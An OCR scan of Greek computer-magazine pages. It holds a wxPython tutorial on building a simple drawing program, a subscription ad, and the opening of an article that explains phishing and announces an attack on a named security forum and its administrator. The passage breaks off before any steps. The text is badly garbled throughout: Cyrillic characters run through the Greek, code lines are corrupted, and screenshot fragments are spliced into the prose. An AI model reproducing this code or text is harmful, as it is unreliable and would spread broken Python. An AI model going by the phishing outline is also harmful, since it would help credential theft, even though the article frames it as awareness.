μας, µε το κατάλληλο data model. 


Στο προηγούμενο àp0po, λοιπὸν, ξεκινήσαμε να δημιουργούμε ша 
απλή εφαρµογή σχεδίασης. Μπορεί va µη φιλοδοξούμε να φτιάξουμε 
το Inkscape σε Python, αλλά νομµἰίζουµε ὁτι η ιδέα δεν εἶναι άσχημη. 
Н κατασκευή ενὸς «παιχνιδιάρικου» προγράµµατος σχεδίασης ἐχει 
ενδιαφἑρον και το τελικὀ προϊόν θα ἐχει την πλάκα του! To πρὀγραμμὰ 
μας θα ονομάζεται The Graffiti Artist. Πρόκειται για éva πρόγραμμα 
βασισμένο σε ἑνα μακρινὸ πρὀγονο των προγραμμάτων σχεδίασης, που 
βγήκε апо ro χρονοντούλαπο της ιστορἰας!. Ας πάρουμε τα πράγματα 
απὸ την αρχἠ κι ας ξεκινήσουμε µε μερικὲς μικρὲς βελτιώσεις στο 
προηγούμενο πρὀγραμμα. 


Ta προκαταρκτικἀ 
Μέχρι στιγμής, στο πρὀγραμμὰ µας σχεδιάζαµε σε éva αντικείµενο τύπου 
DrawPanel, το οποίο δημιουργήσαμε απὀ το wx.Frame class: 
class DrawPanel(wx.Frame): 
def init (self): 


super(DrawPanel,self). init (parent=None, 
size-(640,480),title-»Simple Drawing Program») 


self.pointlist = PointList() 
self.Bind(wx.EVT PAINT, self.OnPaint) 
self.Bind(wx.EVT LEFT DOWN, self.LeftClick) 


Αν και αυτό δεν αποτελεἰ kánoiou gióouc naparunia, εἶναι προτιμότερο va 
χρησιμοποιούμε την κλάση wx.Frame για το περίγραμμα του παραθύρου 
κι αντικείμενα ὅπως το μενού και ог γραμμές εργαλείων, ενώ για το 


1. Συγκεκριµένα, anó την ντουλάπα της κρεβατοκάμαρας του γράφοντα ;) 
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simpledrawing3.py - /data/home/sonic/tutorials/wxpython/7/source/simpledrawing3.py 


Format Run Options Windows Help 


dc.DrawLine(lastpoint[0], lastpoint[1],x,y) Π 


OnMotion(self, e): 
dc = wx.ClientDC(self) 
dc.SetPen(wx.Pen(self.curr: 


ed From ... €3! Yahoo! ** Google Maps W Wikipet 


self.Refresh() 

e.GetX() 

e.GetY() 

f self.pointlist.length() 
lastpoint = self.pointli 
dc.DrawLine (lastpoint [0] 
self.lastx - x 
self.lasty = y 

e.Skip() 


x 
y 
š 


def OnIdle(self, e): 
dc = wx.ClientDC(self) 
dc.SetPen(wx.Pen(self.curr 
if self.pointlist.length()] 
lastpoint = self.pointli 
dc.DrawLine(lastpoint[0] 
e.Skip() 
def OnPaint(self, e): 
dc - wx.PaintDC(self) 
dc.SetPen(wx.Pen(self.curr 
$dc.SetBrush (wx.Brush(wx.C 
if self.pointlist.length() 
(x,y,color) = self.point 
dc.SetPen(wx.Pen(color,l 
for thepoint in self.poi 
dc.SetPen(wx.Pen(thepo 
dc.DrawLine(x,y, thepoj 
x thepoint[0] 
y thepoint[l1] 
if self.linedrawing.length 


for pointlist in self.linedrawing.Iinelist: 
(x,y,color) = pointlist.point[0] 
dc.SetPen(wx.Pen(color,l16)) 

for thepoint in pointlist.point: 


KE 


Ln: 70|Col: 51 


περιεχόµενο va στηριζὀµαστε στην κλάση wx.Window. Επιτρέψτε µας 
λοιπὀν να κάνουμε τις σχετικἐς αλλαγές, επεμβαΐνοντας στις αρχικὲς 
vpaupé&g rou προγράμματος. Με την ευκαιρία, θα αλλάξουμε και το χρώμα 
TOU (QÓVTOU... 


class DrawPanel(wx.Window): 
def — init (self, parent, theid): 
super(DrawPanel,self). init (parent, theid) 
self.SetBackgroundColour(«white») 


Τώρα, βέβαια, πρέπει να δημιουργήσουμε και µια κλάση yia το 
wx.Frame: 


class DrawFrame(wx.Frame): 
def init (self, parent): 


super(DrawFrame, self). init (parent, -1, «The Graffiti 


Artist», size-(800,600)) 
self.drawpanel - DrawPanel(self, -1) 


Ὅταν δημιουργούμε éva αντικείμενο της κλάσης DrawFrame, 
δημιουργείται αυτόματα κι ἑνα αντικείµενο DrawPanel (ως child): 


self.drawpanel = DrawPanel(self, -1) 


Φυσικά, κάπου µέσα στον κύριο βρὀχο, πρέπει να δημιουργήσουμε και TO 
DrawFrame object: 


>>> 
>>> ==================== 
>>> 


>>> ==================== 


H πρώτη επίσημη 
δοκιμή του Graffiti 
Artist. Δοκιμάζουμε 
το Hello, µε όλα 
τα χρώματα που 
υποστηρίζει το 
πρόγραμμα 
Οποιαδήποτε 
ομοιότητα 
HE τσίρκο 
εἶναι εντελώς 
συμπτωματική! 
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def main(): 

app = wx.App(False) 

frame = DrawFrame(None) 

frame.Show() 

app.MainLoop() 
Μπορούμε πλέον να αφαιρέσουμε και τον κὀκκινο κύκλο, αφαιρώντας 
τις αντίστοιχες γραμμές σχεδίασης апо την συνάρτηση OnPaint. Εἰπαμε: 
Тора φτιάχνουμε σοβαρὀ πρὀγραμμα κι ἑνας ξεκάρφωτος κύκλος δεν 
ἐχει каша δουλειὰ στο περιεχόμενο µας! Μετὰ апо τις παραπάνω апАёс 
αλλαγές, μπορούμε να εστιάσουµε σε πιο σημαντικἁ θέματα. 


Το τἐλος της μονοκονδυλιάς 


Н συμπεριφορά του προγρἀμματὸς µας εἶναι κάπως περίεργη. Με κάθε 
αριστερό κλικ σχεδιάζει µια γραμμή μεταξὺ των δύο τελευταίων σημείων. 
Φαίνεται va εἶμαστε καταδικασμένοι να κἄνουμε όλα µας τα σχέδια ... 
μονοκονδυλιά. Μια πιο σωστή συμπεριφορά θα ἦταν: 


ο То прото αριστερὀ κλικ να ορίζει το αρχικό σημείο σχεδίασης 

ο Το δεύτερο αριστερὀ κλικ να σχεδιάζει τη γραμμὴ μέχρι τη νέα 
θέση του δείκτη, και να ορἰζει αυτό το σηµείο ως αρχικὀ για την 
enópevn γραμμή. 

ο Συνεχίζοντας та αριστερά κλικ θα σχηματίζονται γραμμὲς — μέχρι 
να βαρεθούμε. 

ο Με δεξὶ κλικ το σχήμα ολοκληρώνεται: Σχεδιάζεται η γραμμή απὀ 
το προηγούμενο σημείο μέχρι τη νέα θέση του δείκτη και το on- 
pelo αυτό ορἰζεται ως τελικὀ! Ἐτσι, μπορούμε va μετακινηθούμε σε 
ἆλλο σημείο του παραθύρου και να ξεκινήσουμε νέο σχέδιο, µε ἑνα 


αριστερὀ κλικ. Ουσιαστικά, το δεξὶ κλικ ισοδυναμεί µε το σήκωμα 
της пёуас απὀ την επιφἀνεια σχεδίασης. 


Ωραία όλα αυτά, αλλά үа τσεκάρετε λίγο ro data model µας. Θα 
μπορούσε να αναπαραστήσει ἑνα τέτοιο σχέδιο; Το data model γνωρίζει 
σημεία τα οποία συνδέονται μεταξύ τους και δεν µπορεί va τα διακρίνει σε 
ξεχωριστἐς ομάδες (ξεχωριστά σχήματα). Ὥρα να φτιάξουμε µια κλάση 
για ολοκληρωμένα-σχήματα-που-αποτελούνται-από-γραμμὲς: 
class LineDrawing: 
def init (self): 
self.linelist-[] 
def addPointList(self, pointlist): 
self.linelist.append(pointlist) 
def length(self): 
return len(self.linelist) 
Έχουμε µια κλάση που αποθηκεύει ομάδες σημείων (τύπου PointList) σε 
µια λίστα. Ουσιαστικά, το πρὀγραμμἁ µας θα ακολουθεἰ αυτή τη λογική: 


ο Κάνουμε αριστερὀ κλικ για να ξεκινήσουμε ἑνα σχέδιο: Τα σημεία 
που ενώνουµε αποθηκεύονται σε va αντικείµενο τύπου PointList 
(self.pointlist στο πρὀγραμμὰ μας). 
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ο Κάνουμε δεξὶ κλικ yia va δηλώσουμε бт! το τρέχον σχήμα ολοκλη- 
ρώθηκε: To self.pointlist µε όλα τα σημεία που περιλαμβάνει ano- 
θηκεύεται σε ἑνα αντικείµενο τύπου LineDrawing. Στη συνέχεια το 
self.pointlist μηδενίζεται. 


e Λαμβάνουμε το OnPaint message: Το πρόγραμμα ξανασχεδιάζει 
όλα τα σχήματα, ὁπως περιγράφονται апо τη λίστα µε та αντικεἰμε- 
να LineDrawing. Υπενθυμίζουμε бт! κάθε αντικείµενο LineDrawing 
περιέχει και αυτό µια λίστα (PointList), µε τα σημεία του αντἱστοι- 
xou σχήματος. Επιπρὀσθετα, отау ληφθεἰ το OnPaint message 
επανασχεδιάζεται και το τρέχον σχήμα (αυτό που δεν ἐχουμε ολο- 
κληρώσει ακόμα), τα σημεία του οποίου βρίσκονται μέσα στο self. 
pointlist. 


Με οδηγὀ τα παραπάνω, εἶναι εὐκολο να φτιάξουμε µια αρχικἠ υλοποίηση. 
Κατ΄ αρχάς, πρέπει να προσθέσουμε την ακόλουθη γραμμή στην Ιπί . 
του DrawPanel: 


self.linedrawing = LineDrawing() 


Επίσης, πρέπει να να opiooupe τη συνάρτηση RightClick, η οποία каліта 
µε το δεξἰ κλικ TOU ποντικιού: 


def RightClick(self, e): 
dc = wx.ClientDC(self) 

e.GetX() 

e.GetY() 


x 


y 
self.MyLine(dc,x,y) 
self.pointlist.addPoint(x,y) 
self.linedrawing.addPointLlist(self.pointlist) 
self.pointlist = PointList() 
e.Skip() 
Ας δούμε TI κάνει αυτἡ η συνάρτηση: 
ο Προσθέτει το τελευταίο σηµείο του σχεδίου στο self.pointlist 
ο Σχεδιάζει την τελευταία γραµµή 


ο Προσθέτει όλη τη λίστα self.pointlist στη Ліста self.linedrawing. 
Χρησιμοποιούμε το member function addPointList, που κάνει 
append. 


e Μηδενίζουµε τη Ліота self.pointlist, καλώντας ξανάἁ rov constructor 
PointList(). 


Φυσικά το παιχνἰδι παἰζεται στην OnPaint, η οποία пєр!ёҗє! πλέον και τις 
ακόλουθες γραμμές: 


if self.linedrawing.length() > е: 
for pointlist in self.linedrawing.linelist: 
(х,у) = pointlist.point[0] 
dc.SetPen(wx.Pen(wx.Colour(0,0,255),16)) 
for thepoint in pointlist.point: 


dc.DrawLine(x,y, thepoint[0], thepoint[1]) 
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x = thepoint[0] 
y = thepoint[1] 


Αν διαπιστώσουμε (µέσα апо την κλήση της length()) ότι υπάρχει ¿va 
τουλάχιστον σχήμα αποθηκευμένο στην self.linedrawing, παίρνουμε το 
πρὠτο του σημείο: 


(х,у) = pointlist.point[0] 


ка! διατρέχουµε бАп τη λίστα των σημείων του σχήματος, τραβώντας 
γραμμὲς апо το ἑνα στο ἆλλο: 


for thepoint in pointlist.point: 
dc.DrawLine(x,y, thepoint[0], thepoint[1]) 
x = thepoint[0] 
y = thepoint[1] 


O εξωτερικὀς βρὀχος διατρέχει όλα τα σχήματα nou έχουμε αποθηκεύσει 
στο self.linedrawing: 


for pointlist in self.linedrawing.linelist: 


To πρὀγραμμἁ µας στην τρἐχουσα µορφή, θα το βρείτε στο αρχείο art- 
ist1.py μέσα στο ZIP µε rov κὠδικα: 


http://bit.ly/dh@18gartist 


Ὄχι ἄλλη σχεδίαση στα τυφλὰ! 


Μια ἀλλη ιδιαιτερότητα rou προγρἀμματὸς µας εἶναι η αδυναμία να 
προβάλλει τη γραμμὴ, η οποία θα σχεδιαστεὶ αν κάνουμε κλικ. Κανονικά, 
κάνοντας то прото κλικ, θα έπρεπε να εμφανίζεται µια γραμμὴ και va 
ακολουθεί το ποντίκι µας μέχρι να κἄνουμε το επὀµενο κλικ. Δεν ξέρω αν 
ἐχετε συνηθίσει να σχεδιάζετε στα τυφλὰ, алла εμάς αυτἠ η συμπεριφορά 
μας ξενίἰζει και πρέπει να την αλλάξουμε! Πα να ακολουθεί η γραµµή 
(via να εἰμαστε ακριβείς: το preview της γραμμής) το ποντίκι, πρέπει το 
πρόγραµµα va επανασχεδιάζει τη γραµµή «κάθεξ фора nou κουνάµε то 
ποντίκι. Па να γίνει αυτό, όμως, πρέπει κάθε φορά που κινείται το ποντίκι 
να λαμβάνουμε κἀποιο σχετικὸ event. Προσθέτουμε λοιπὀν το παρακάτω 
Bind: 


self.Bind(wx.EVT_MOTION, self.OnMotion) 
„кат γράφουμε τη συνάρτηση OnMotion: 
def OnMotion(self, e): 
dc = wx.ClientDC(self) 
dc.SetPen(wx.Pen(wx.Colour(0,0,255),16)) 
self.Refresh() 
x = e.GetX() 
y = e.GetY() 
if self.pointlist.length()»0: 
lastpoint = self.pointlist.getLlastPoint() 
dc.DrawLine(lastpoint[0], lastpoint[1],x,y) 
e.Skip() 
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The Graffiti Artist 


Н λειτουργία της συνάρτησης εἶναι αρκετά απλἠ. Καταρχάς, va πούμε От! 
η συνάρτηση OnMotion καλείται όταν κουνάµε το ποντίκι, µε τη βοήθεια 
TOU bind που εἰδαμε παραπάνω. Εντὸς της συνάρτησης γίνονται τα εξής: 
Οι τρέχουσες συντεταγμένες αποθηκεύονται στις μεταβλητές x και y. 
Αν υπάρχει ανοικτὸ σχήμα (self.pointlist.length()>0), παίρνουμε και το 
τελευταίο σηµείο του µε την getLastPoint και σχηματίζουμε τη γραμμή. 
Με δεδομένο ὅτι το μοντέλο µας δεν αποθηκεύει αυτή την προσωρινἠ 
απεικόνιση, όταν κουνήσουμε ξανὰ το ποντίκι η θέση της үранийс θα 
αλλάξει και η пала θα εξαφανιστεί. Ἡ μήπως ὀχι; Κάντε va πεἱραμα κι 
αφαιρέστε την εξὴς γραμμή: 
self.Refresh() 


Δοκιμάστε тора να εκτελέσετε TO πρὀγραμμα. Av το κάνετε, θα δείτε От! 
καθώς κινεῖται το ποντίκι, βάφονται *ra πάντα μπλε! Αν όμως κάνετε 
minimize-maximize στο παράθυρο, θα κληθεἰ η OnPaint και μάλιστα µε 
clipping area όλη rnv περιοχἠ σχεδίασης, κι ως δια μαγείας οι περιττὲς 
μπλε γραμμές, θα εξαφανιστούν. E, λοιπὸν, auró κἀνει και το self.Re- 
fresh(): Καλεί την OnPaint κάθε фора που εκτελείται η OnMove, µε clip- 
ping area ὁλο το παράθυρο. Έτσι, το preview της γραμμὴς εμφανίζεται 
μόνον ògo κουνάμε το ποντίκι κι όλα τα προηγούμενα στιγμιότυπα 
εξαφανἰζονται. Πα την ακρίβεια, η γραμμὴ εμφανίζεται *uóvov* για боо 
κουνάμε το novriki κι εξαφανίζεται μόλις σταματήσουμε την κἰνηση! Xp, 
αυτό δεν εἶναι καλὀ! Το preview της γραμμἠς πρέπει να εἶναι συνεχώς 
ορατό. Άραγε, ποιο event υπάρχει γιατην opa που ro πρὀγραμµα δεν κάνει 
τίποτα; Όπως φαντάζεστε, σε auró το event θα θέλαμε να συνδέσουµε 
µια συνάρτηση, η οποία θα σχεδίαζε ro preview της γραμμής! Τελικά, то 


Δεν εἶπαμε От! 

TO πρὀγραμμα 

μας εἰναι 
διαπλατφορμικό; 
Εδώ τρέχει στο 
Raspberry Pi, 

τον γνωστό 
υπολογιστή των 
30€ (Μηδέν € 

για μένα. Μου 

το ἐκαναν δώρο. 
Ζηλέψτε.) Θα 
πρέπει να ξέρετε 
ότι TO RPI Ох! 
απλώς υποστηρίζει 
την Python, 

алла την ἐχει ка! 
προεγκατεστημένη 
στη διανοµή 
Raspbian (Rasp- 
berry Debian). 
Έχει μάλιστα 
εγκατεστημένο και 
TO pygame, yia va 
τρέχετε εφαρμογές 
wx (αρκεί να 
εγκαταστήσετε 

τη βιβλιοθήκη, 

ως root: apt-get 
install python- 
wxgtk2.8). 
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event που χρειαζόμαστε υπάρχει και ονομάζεται idle event. Ας δούμε TO 
αντίστοιχο Bind: 


self.Bind(wx.EVT_IDLE, self.OnIdle) 
каг тора τη σχετική συνάρτηση: 
def OnIdle(self, e): 
dc = wx.ClientDC(self) 
dc.SetPen(wx.Pen(wx.Colour(0,0,255),16)) 
if self.pointlist.length()»0: 
lastpoint = self.pointlist.getlLlastPoint() 


dc.DrawLine(lastpoint[0], lastpoint[1], self.lastx, self. 
lasty) 


e.Skip() 


Па μισὸ λεπτὸ, τι εἶναι αυτά τα self.lastx και self.lasty; Σε αυτὲς τις 
μεταβλητές αποθηκεύουµε το τελευταίο σηµείο nou επισκεφτήκαμε 
µε την OnMotion (δείτε τον κὠδικα στο artist2.py). Αυτό το κάνουμε 
γιατί ro event object (e), µέσα στη συνάρτηση Onldle, δεν περιἐχει τις 
συντεταγμένες του ποντικιού κι ара δεν μπορούμε να τις μάθουμε µε 
GetX() και GetY(). Αυτές τις δύο μεταβλητές τις έχουμε ορἰσει στην __ 
init__ του DrawPanel class, µε τιμή -1. Το γιατὶ κάναμε κάτι τέτοιο θα то 
καταλάβετε στη συνέχεια. 


Αν εκτελέσετε TO πρὀγραμμα ropa, θα νομίζετε ὅτι όλα πηγαίνουν 
кала. To πρὀγραμμα θα μοιάζει να συμπεριφέρεται ολόσωστα. Ωστόσο, 
όταν κάνετε δεξὶ κλικ (για va τερµατίσετε ¿va σχέδιο) και στη συνέχεια 
αριστερὀ (για να ξεκινήσετε éva vo), θα εµφανιστεἰ στιγμιαία ἑνα 
акоро preview. Συγκεκριµένα, θα εμφανιστεί το preview µιας үранийс, 
η οποία ορἰζεται апо το τελευταίο σημείο του προηγούμενου σχήματος 
κι αυτὸ στο οποίο βρίσκεται тора το ποντίκι Па να λύσουμε auró το 
πρόβλημα, θα αξιοποιήσουμε το «-1» που επιλέξαμε ως αρχικἠ τιµή για 
τα self.lastx και self.lasty. Αυτή η τιµή θα ερμηνεύεται апо το πρὀγραμμα 
ως εξἠς: «О χρήστης μόλις ξεκίνησε ёха νέο σχήμα και δεν χρειάζεται 
να σχεδιαστεί κἄποιο preview». Па να υλοποιηθεί αυτός ο μηχανισμὀς, 
χρειάζεται µια µικρή προσθήκη στον τελευταἰο ἐλεγχο if Tou προηγούμενο 
αποσπάσματος. Συγκεκριµένα, ο ἐλεγχος πρέπει να πάρει την παρακάτω 
µορφή: 


if self.pointlist.length()»0 and self.lastx > Ө: 


Па τη δηµιουργία του iiou μηχανισμού, ká8e фора nou κάνουμε δεξὶ 
κλικ πρέπει va εκτελούµε και τις ακόλουθες εντολέἑς: 


self.lastx=-1 

self.lasty=-1 
Αυτὲς πρέπει να μπουν στη συνάρτηση RightClick. Па να δείτε το 
πρόγραμμα στην τρἐχουσα µορφή rou, ανοίξτε το αρχείο artist2.py. 
O κόσμος δεν εἶναι μπλε! 


Ἴσως va εἰσαστε αρκετά ιδιὀτροποι και να χρησιμοποιείτε µόνο μπλε 
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spray για ra graffiti cac. Στην Python όμως ra χρώματα εἶναι δωρεάν 
και εἶναι κρίμα va ra σνομπάρετε. Па το λόγο αυτό, θα αναβαθµίσουμε 
το πρὀγραμμἁ µας ώστε να μπορούμε у’ αλλάζουμε χρώμα σχεδίασης! H 
ιδέα µας ἐχει ως εξἠς: 


ο Σχεδιάζουμε ἑνα toolbar ue та διαθέσιµα χρώματα, σε ὀμορφα Kou- 
μπάκια. 


ο Προσθέτουμε τη δυνατότητα αποθήκευσης του χρώματος για κάθε 
γραμμὴ, στο data model. Ουσιαστικά, η λίστα µε τα σημεία δεν θα 
αποθηκεύει µόνο τις συντεταγμένες των διαφόρων σημείων, αλλά 
και το χρώμα”. 


ο Αλλάζουμε τις εντολὲς dc.SetPen, ὥστε να χρησιμοποιούν το επι- 
λεγμένο κἆθε φορά χρώμα. 


ο Προσαρμόζουμε την OnPaint, ὡστε ката την επανασχεδίαση του 
περιεχομένου να επιλέγει TO σωστὀ χρώμα. 


Μπορείτε να δείτε ὀλες τις αλλαγές στον κὠδικα nou περιγράψαμε 
παραπάνω, στο αρχείο artist3.py. 


Το ToolBar 


To toolbar βρίσκεται στο DrawFrame class. Ξέρετε ђӧп nog φτιάχνεται, 
αν και εδώ υπάρχουν μικρὲς αλλαγές. Ας δούµε ἑνα τµήµα rou κὠδικα: 


self.toolbar = self.CreateToolBar() 
self.ID RED = wx.NewId() 


redtool - self.toolbar.AddTool(self.ID RED, wx.Bitmap(«red. 
png»), isToggle-True) 


To συγκεκριμένο toolbar δεν χρησιμοποιεἰὶ τα τυποποιημένα ID που 
εἰχαμε στον wxEditor. Έτσι, δημιουργούμε δικἁ µας ID µε τη βοήθεια της 
wx.NewId(). H επιλογή isToggle επιτρέπει να φτιάξουμε κουμπάκια που 
φαίνονται πιεσµένα ὀταν τα επιλέγουμε. Το γενικού τύπου event nou 
χρησιμοποιείται yia τα toolbars εἶναι το EVT TOOL. H σχετικἠ Bind ἐχει 
ως εξής: 

self.Bind(wx.EVT_TOOL, self.OnSetColor, redtool) 


Κάθε фора που πατάμε σε κάποιο κουμπάκι тои toolbar, каліта η 
συνάρτηση OnSetColor: 


def OnSetColor(self, e): 
commandId = e.GetId() 
for toollId in range(self.ID RED, self.ID BLACK): 
self.toolbar.ToggleTool(toollId, 0) 
self.toolbar.ToggleTool(commandId, 1) 
if commandId -- self.ID RED: 
self.drawpanel.currentcolor = wx.Colour(255,0,0) 


elif commandId -- self.ID GREEN: 


To прото πράγμα γίνεται στην OnSetColor εἶναι va διατρέξουµε óda τα 


2. (х, у, color) avri үа (х,у). 


Graffiti Artist: Από 
την πρώτη στιγµή 
που ο συγγραφέας 
σκαρφίστηκε 

TO ὀνομα του 
προγράμματος, 
κάτι του θύμιζε. 
Μα, τι ἀλλο απὀ 
το πρὀγραμμα 
Texas Artist, 

που εἰχε γράψει 
στον αγαπημένο 
του ΤΙ-99/4Α, 
στην τρυφερή 
ηλικία των 16! 

Το συγκεκριµένο 
πρόγραμμα | 
χρησιμοποιούσε 
block graph- 

ics (χαρακτήρες 
που εἰχαμε 
επανακαθορίσει 

το σχήμα τους), 
τους οποίους 
τοποθετούσε σε 
όποιο σημείο της 
οθὀνης θέλαμε. 

Το τελικὀ σχήμα 
μπορούσαμε να το 
αποθηκεύσουµε σε 
κασέτα (η οποία 
σε πείσμα των 
καιρών, λειτουργεί 
akóua ша χαρά). 


To πρὀγραμµα ἦταν 


πολύ µπροστά για 
την εποχή TOU: 
Όχι µόνο εἶχε 


οθόνη φορτώματος 


(splash screen), 
алла διέθετε 
διαφορετικἁ σετ 
χαρακτήρων, Τα 
οποία φόρτωνε 
апд αρχείο για 
δηµιουργία 
διαφορετικὠν 
τύπων γραφικών. 
Ποιος εἰπε ὁτι 
χρειάζεται κανείς 
Ghz kai MB για va 
κάνει δουλειά; 
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κουμπάκια της μπάρας µε µια for, yia va εξασφαλἰσουμε ὁτι δεν εἶναι 
πιεσµένο κανένα. Ἐπειτα, αλλάζουμε την κατάσταση στο κουμπάκι 
του επιλεγμένου χρώματος σε «πιεσμένο». Αυτές οι ενέργειες γίνονται 
µε τη συγκεκριμένη for, διότι μόνο ἑνα κουμπάκι χρώματος рпорєі va 
εἶναι πατημένο κάθε φορὰ! O κὠδικας συνεχίζεται µε ἐλεγχους If, οι 
οποίοι ελέγχουν την κατάσταση των κουμπιών της μπάρας και ορίζουν 
κατάλληλα το currentcolor (ανάλογα µε την επιλογἠ του χρήστη). 


Αυτἠ η εκδοχἠ rou κὠδικα (που για την opa θα τη χαρακτηρίσουµε ως 
«τελικἠ» αλλά μόνο τέτοια δεν εἶναι) βρίσκεται στο αρχείο artist3.py. 
Μέχρι το επόμενο άρθρο, σας προκαλούμε να τη χρησιμοποιήσετε και 
να τη βελτιώσετε. Oa σας προτεἰναμε σαν άσκηση ra εξἠς. 


ο Να πραγµατοποιήσετε την επιλογἡ του χρώματος µε καλύτερο τρὀ- 
πο ki Ох! µε ἑνα соро if. Αυτὴ η λύση δουλεύει, αλλά δεν εἶναι 
καθόλου κομψὴ! 


e Θα ἦταν πιο σωστό το LineDrawing class να περιέχει το αντικείµενο 
τύπου PointList. Μπορείτε να κάνετε τη σχετικἠ τροποποἱηση, aà- 
λάζοντας κι όλα τα member functions ónou χρειάζεται; 


e Ti απαιτεῖται yia να µπορεί το πρόγραµµα να αποθηκεύει και να 
φορτώνει τα σχἑδιἁ µας; 


ο Μπορείτενα προσθέσετε ἆλλα σχήματα εκτὸς апо γραμμές; Т λέτε 
για εργαλείο κύκλων; Μπορείτε να προσθέσετε τη δυνατότητα ορι- 
σμού διαφορετικού πάχους για τη γραμμὴ; Ti θα λέγατε yia «ελεύ- 
θερη» σχεδίαση; 


Στο επὀµενο τεύχος θα επανἐλθουµε µε περισσότερες ιδέες, βελτιώσεις 
και φυσικἁ κὠδικα! Μέχρι τότε, happy Pythoning ;) 


ш! 
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Το deltaHacker είναι το μοναδικό στο χώρο 
των περιοδικών έντυπο µε θεματολογία 
ethical hacking, δίκτυα και ασφάλεια, 
προγραμματισμό και ηλεκτρονικά. 


To deltaHacker δεν γυρνάει εδώ κι εκεί στα 
περίπτερα, αλλά για δεύτερη χρονιά στη σειρά 
έρχεται κατευθείαν στο σπίτι σας. 


Αν είστε από εκείνους που δεν βλέπουν τον 
υπολογιστή τους ως άλλη µια οικιακή συσκευή 
και δεν αντιμετωπίζετε το Internet ως ένα δίκτυο 
που αρχίζει και τελειώνει µε το Facebook και 

το Twitter, τότε είναι 10796 βέβαιο ότι θα 
αγαπήσετε το deltaHacker, καθώς κι ότι θα 
θέλετε την παρέα του κάθε μήνα. 


Όλες οι πληροφορίες για όλα τα προγράμματα 
συνδροµών είναι στο 


deltahacker.gr/subscriptions 

Παραγγείλετε τώρα µία από τις συµφέρουσες 
συνδρομές από το 

deltahacker.gr/order 

Σηµείωση: Οι ооубронёс σας μπορούν να ξεκινούν 
από όποιο τεύχος επιθυμείτε, αρκεί να υπάρχει 


σε stock. Την ύλη όλων των τευχών που έχουν 
κυκλοφορήσει ως τώρα µπορείτε να τη δείτε στο 


deltahacker.gr/category/magazine-issues 


«ρε 


click to win 


q pair of shoes! 


NP, 
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abidas 


Πως 

να µην 
πιαστείτε 
στον ...ξὐπνιοί 


Τελικά, φαίνεται ότι οι απάτες phishing 
εἶναι αρκετά αποτελεσματικές. Μόνον 
¿TOI μπορεῖ να εξηγηθεί ro γεγονὸς бт! 
πυκνώνουν. Апо τη στιγµή που µας 
ενδιαφέρουν ra θέματα ασφάλειας, AUTÒ 
σημαίνει От! οφείλουμε να γνωρίζουμε 
για το πώς στήνονται. Τουλάχιστον £TOI 
νομίζουμε εμείς — και κάτι µας λέει ὅτι θα 
συμφωνήσετε μαζὶ µας. 


Εικόνα 1 

To forum στο οποίο 
θα επιτεθούμε. Αν 
ο διαχειριστής TOU 
εἶναι απρὀσεκτος, 
θα αποκτήσουμε 
σύντομα τον πλήρη 
ἐλεγχο του site... 
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«Phishing is the act of attempting to acquire information such as 
usernames, passwords and credit card details (and sometimes, indirectly, 
money) by masquerading as a trustworthy entity in an electronic 
communication.» 


Νομίζουμε ὁτι ο παραπάνω opiouóc апо την Wikipedia та λἐει όλα: To 
phishing αποτελεἰ ξεκάθαρα µια παράνομη πράξη κι όποιος επιδίδεται 
σε αυτήν δεν διαφἑρει σε τίποτε απὀ τον κλέφτη του κοινού ποινικού 
δικαϊου. Μολαταύτα, στο παρὀν ἆρθρο θα δείξουμε nog επιτυγχάνεται 
το phishing! Πριν αρχίσετε τις (δικαιολογημένες) ενστάσεις, πρέπει va 
σας πούμε το εξής: O καλύτερος τρόπος yia να προστατευτεἰ κανεὶς апо 
επιθέσεις εἶναι να μάθει nog ακριβὼς σκέφτεται και λειτουργεί ο επιτι- 
θέμενος. Τότε και μόνο τότε μπορεὶ va εἶναι κανείς ενημερωμένος και 
υποψιασμένος, ὡστε να αντιλαμβάνεται πότε µια κατάσταση εἶναι, χμ, 
περἰεργη. O στόχος µας δηλαδἠ δεν εἶναι να εκπαιδεύσουµε εγκληματίες, 
алла να οξύνουμε ra αντανακλαστικἀ όλων ὁσοι ενδιαφἑρονται για την 
ασφάλεια στο Διαδίκτυο. 


To phishing φοριέται πολὺ τον τελευταίο καιρὸ και δυστυχώς ἐχει χιλιά- 
δες θύματα. O στὀχος των επιτιθέµενων εἶναι полу συχνά ο ἰδιος: Na 
κλέψουν απὸ το εκάστοτε θύμα τα credentials (username καὶ password) 
апо διάφορες υπηρεσὶες (ката προτίμηση web banking). H μέθοδος των 
απατεώνων εἶναι απλἠ: Κατασκευάζουν ёха site *navopoióruno* µε εκεἰ- 
νο που επισκέπτεται συχνὰ (κι ἄρα εμπιστεύεται) το θύμα. Επιπρόσθετα, 
οι απατεώνες φροντίζουν να τοποθετήσουν το ψεύτικο site σε domain το 
οποίο μοιάζει µε εκείνο του αυθεντικού site. Στη συνέχεια στέλνουν ἑνα 
email, το οποίο περιέχει link προς το site-nayióa και ζητούν anó το θύμα 


pOwnbox » Portal - Mozilla Firefox 


File Edit View History Bookmarks Tools Help 


| Q pownbox * Portal 
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SEARCH 


È user menu 


Latest news 


Πώς να µην πιαστείτε στον ..ξύπνια! 
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va συνδεθεί. Οι ανυποψἰαστοι χρήστες nou θα ακολουθήσουν ro link, 
θα δουν va γνώριμο site κι εκεἰ eivai, πράγματι, πιθανὸ να εισαγάγουν 
τα στοιχεία τους. Μόλις γίνει auro, το site θα προωθἠσει ra credentials 
του θύματος στον απατεώνα και στη συνέχεια θα κάνει redirect προς το 
αυθεντικὀ site. Έτσι, αν το ανυποψίαστο θύμα επιχειρήσει να συνδεθεὶ 
ξανά (θεωρώντας бт! kave κἀποιο λάθος την πρώτη фора) θα συνδεθεὶ 
κανονικἀ. Εδώ υπάρχει µια ενδιαφέρουσα λεπτομέρεια: O! εξελιγμένες 
επιθέσεις του εἶδους βασίζονται σε «ἐξυπνα» sites, τα onoia αξιοποιούν 
τα στοιχεία του θύματος και κάνουν αυτόματα login στο npaypariko site. 
Σε αυτές τις περιπτώσεις, το θύμα συνδέεται στην εκάστοτε υπηρεσία 
κανονικὰ και εἶναι πολύ δύσκολο να αντιληφθεί την απάτη. 


Ὅπως υποψιάζεστε, εμεἰὶς θα υλοποιήσουμε µια ἄκρως εξελιγμένη επἰθε- 
ση’. Хтоҳо µας θα αποτελἐσει éva ελληνικὀ forum για την ασφάλεια, το 
pOwnbox.com, στο onoio ἑνας anó τους διαχειριστὲς ονομάζεται Thiseas 
(ВА. εικὀνα 1). 


Τα βήματα που θα ακολουθήσουμε εἶναι τα ακόλουθα. 
